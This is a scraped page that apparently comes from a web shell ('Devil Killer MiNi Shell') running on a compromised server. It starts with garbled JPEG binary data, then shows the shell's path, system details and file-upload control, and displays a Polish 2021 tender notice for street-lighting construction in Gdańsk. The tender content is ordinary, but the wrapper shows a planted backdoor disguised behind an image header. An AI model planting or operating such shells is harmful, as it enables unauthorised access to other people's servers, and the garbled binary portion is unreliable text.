JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210714/0011453901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00114539 z dnia 2021-07-14</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa oświetlenia ulic w Gdańsku w ramach programu "Jaśniejszy Gdańsk"<br/>Edycja 2020 Etap XII </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dyrekcja Rozbudowy Miasta Gdańska działająca w imieniu i na rzecz Gminy Miasta Gdańska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000168372</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żaglowa 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-560</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 320 51 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">drmg@gdansk.gda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.drmg.gdansk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka organizacyjna administracji samorządowej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa oświetlenia ulic w Gdańsku w ramach programu "Jaśniejszy Gdańsk"<br/>Edycja 2020 Etap XII </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-238a9d7f-e477-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00114539</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005662/57/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.85 Budowa oświetlenia ulic w Gdańsku w ramach programu "Jaśniejszy Gdańsk" Edycja 2020 Etap XII</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/drmg_gdansk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/drmg_gdansk</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:<br/> stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej<br/>niż 512 kb/s;<br/> komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB<br/>Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów<br/>operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje;<br/> zainstalowana dowolna przeglądarka internetowa, w przypadku Internet<br/>Explorer minimalnie wersja 10 0.;<br/> włączona obsługa JavaScript;<br/> zainstalowany program Adobe Acrobat Reader lub inny obsługujący format<br/>plików .pdf;<br/> Platforma działa według standardu przyjętego w komunikacji sieciowej -<br/>kodowanie UTF8;<br/> Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę<br/>oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, zamawiający<br/>informuje, że:<br/>1) administratorem danych osobowych, które mogą zostać przekazane<br/>zamawiającemu w toku niniejszego postępowania jest Dyrekcja Rozbudowy<br/>Miasta Gdańska, 80–560 Gdańsk, ul. Żaglowa 11 działająca w imieniu Gminy<br/>Miasta Gdańska;<br/>2) firmą podprzetwarzającą dane w imieniu administratora jest<br/>platformazakupowa.pl, którego operatorem jest Open Nexus Sp. o.o.<br/>z siedzibą w Poznaniu, ul. Bolesława Krzywoustego 3, 61-144 Poznań;<br/>3) inspektorem ochrony danych osobowych w Dyrekcji Rozbudowy Miasta<br/>Gdańska jest Pan Daniel Gramatowski, mail: iod.drmg@gdansk.gda.pl +48 58<br/>550 75 23;<br/>4) dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b i c RODO w<br/>celu związanym z niniejszym postępowaniem o udzielenie zamówienia<br/>publicznego;<br/>5) odbiorcami danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz<br/>art. 96 ust. 3 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych<br/>(Dz. U. z 2019r. poz. 2019 ze zm.);<br/>6) dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy, przez<br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia,<br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy oraz przedawnienia wynikających z niej<br/>roszczeń;<br/>7) obowiązek podania danych osobowych jest wymogiem ustawowym<br/>określonym w przepisach ustawy, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego, konsekwencje niepodania określonych<br/>danych wynikają z ustawy;<br/>8) dane nie będą udostępniane innym podmiotom niż upoważnionym na<br/>podstawie przepisów prawa z wyjątkiem podmiotów świadczących na rzecz<br/>administratora danych czynności związane z bieżącą obsługą jego działalności<br/>np. usługi księgowe, usługi informatyczne itp.;<br/>9) w odniesieniu do danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>10) osoby, których dane osobowe zostaną przekazane zamawiającemu w toku<br/>niniejszego postępowania posiadają:<br/>− na podstawie art. 15 RODO, prawo dostępu do danych osobowych ich<br/>dotyczących,<br/>− na podstawie art. 16 RODO, prawo do sprostowania danych osobowych<br/>ich dotyczących, z tym że skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianą wyniku niniejszego postępowania, ani zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą oraz nie może<br/>naruszać integralności protokołu z postępowania oraz jego załączników,<br/>− na podstawie art. 18 RODO, prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy którakolwiek z tych osób uzna, że przetwarzanie danych<br/>osobowych ich dotyczących narusza przepisy RODO;<br/>11) osobom, których dane osobowe zostaną przekazane zamawiającemu w toku<br/>niniejszego postępowania nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO, prawo do usunięcia danych<br/>osobowych,<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO,<br/>− na podstawie art. 21 RODO, prawo sprzeciwu wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">84/BZP-U.510.63/2021/MS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.1. Część nr 1.<br/>Nazwa: 1) Budowa oświetlenia ul. Białostockiej w Gdańsku;<br/>2) Budowa oświetlenia ul. Św. Huberta w Gdańsku.<br/>2.1.1. Zakres rzeczowy robót obejmuje:<br/>1) Budowę oświetlenia ul. Białostockiej w Gdańsku:<br/>a) prace demontażowe i odtworzeniowe;<br/>b) ułożenie linii kablowych oświetleniowych nN-0,4kV;<br/>c) montaż słupów oświetleniowych wraz z fundamentami i wysięgnikami;<br/>d) montaż opraw oświetleniowych z LED’owym źródłem światła;<br/>e) podłączenia linii kablowych do słupów oświetleniowych, pola<br/>odejściowego w szafce oświetleniowej oraz do istniejących słupów<br/>oświetleniowych;<br/>f) zabezpieczenie istniejących sieci;<br/>g) odtworzenie elementów zagospodarowania terenu.<br/>2) Budowę oświetlenia ul. Św. Huberta w Gdańsku:<br/>a) prace demontażowe i odtworzeniowe;<br/>b) ułożenie linii kablowych oświetleniowych nN-0,4kV;<br/>c) montaż słupów oświetleniowych wraz z fundamentami i wysięgnikami;<br/>d) montaż opraw oświetleniowych z LED’owym źródłem światła;<br/>e) podłączenia linii kablowych do słupów oświetleniowych oraz do<br/>istniejących słupów oświetleniowych;<br/>f) doposażenie istniejącej szafy oświetleniowej;<br/>g) demontaż słupów, wysięgników i opraw oświetleniowych;<br/>h) zabezpieczenie istniejących sieci;<br/>i) odtworzenie elementów zagospodarowania terenu;<br/>j) wycinka krzewów i drzew. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">91 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie minimalnego okresu gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.2. Część nr 2.<br/>Nazwa: Budowa oświetlenia ul. Kępnej w Gdańsku.<br/>2.2.1 Zakres rzeczowy robót obejmuje:<br/>a) prace demontażowe i odtworzeniowe;<br/>b) przebudowa (przełożenie i zabezpieczenie) sieci teletechnicznej;<br/>c) ułożenie linii kablowych oświetleniowych nN-0,4kV;<br/>d) montaż słupów oświetleniowych wraz z fundamentami wysięgnikami;<br/>e) montaż opraw oświetleniowych z LED’owym źródłem światła;<br/>f) podłączenia linii kablowych do słupów oświetleniowych oraz do<br/>istniejących słupów oświetleniowych;<br/>g) montaż dwóch szaf oświetleniowych;<br/>h) demontaż istniejącego oświetlenia;<br/>i) zabezpieczenie istniejących sieci;<br/>j) odtworzenie elementów zagospodarowania terenu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">91 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie minimalnego okresu gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.3. Część nr 3.<br/>Nazwa: Budowa oświetlenia ul. Herosa, Konstelacji, Seleny w Gdańsku.<br/>2.3.1. Zakres rzeczowy robót obejmuje:<br/>a) prace demontażowe i odtworzeniowe;<br/>b) ułożenie linii kablowych oświetleniowych nN-0,4kV;<br/>c) montaż słupów oświetleniowych wraz z fundamentami wysięgnikami;<br/>d) montaż opraw oświetleniowych z LED’owym źródłem światła;<br/>e) podłączenia linii kablowych do słupów oświetleniowych oraz do<br/>istniejących słupów oświetleniowych;<br/>f) doposażenie istniejącej szafy oświetleniowej;<br/>g) odtworzenie elementów zagospodarowania terenu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">91 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie minimalnego okresu gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia na część nr 1 mogą ubiegać się wykonawcy, którzy nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie, co najmniej jedno zamówienie obejmujące swoim zakresem budowę lub przebudowę oświetlenia zewnętrznego (np. ulicznego, parkingowego lub parkowego) z zastosowaniem technologii LED, o wartości zamówienia równej lub wyższej niż 120 000 zł brutto.<br/>2. O udzielenie zamówienia na część nr 2 mogą ubiegać się wykonawcy, którzy nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie:<br/>1) co najmniej jedno zamówienie obejmujące swoim zakresem budowę lub<br/>przebudowę oświetlenia zewnętrznego (np. ulicznego, parkingowego lub<br/>parkowego) z zastosowaniem technologii LED, o wartości zamówienia równej<br/>lub wyższej niż 300 000 zł brutto.<br/>2) co najmniej jedno zamówienie obejmujące swoim zakresem budowę lub<br/>przebudowę sieci telekomunikacyjnej, o wartości zamówienia równej lub<br/>wyższej niż 65 000 zł brutto.<br/>3. O udzielenie zamówienia na część nr 3 mogą ubiegać się wykonawcy, którzy nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie, co najmniej jedno zamówienie obejmujące swoim zakresem budowę lub przebudowę oświetlenia zewnętrznego (np. ulicznego, parkingowego lub parkowego) z zastosowaniem technologii LED, o wartości zamówienia równej lub wyższej niż 150 000 zł brutto.<br/>4. W przypadku składania ofert na dwie lub trzy części zamówienia, wystarczające jest wykazanie przez wykonawcę spełnienia warunku udziału w postępowaniu dot. budowy lub przebudowy oświetlenia zewnętrznego (np. ulicznego, parkingowego lub parkowego) z zastosowaniem technologii LED, 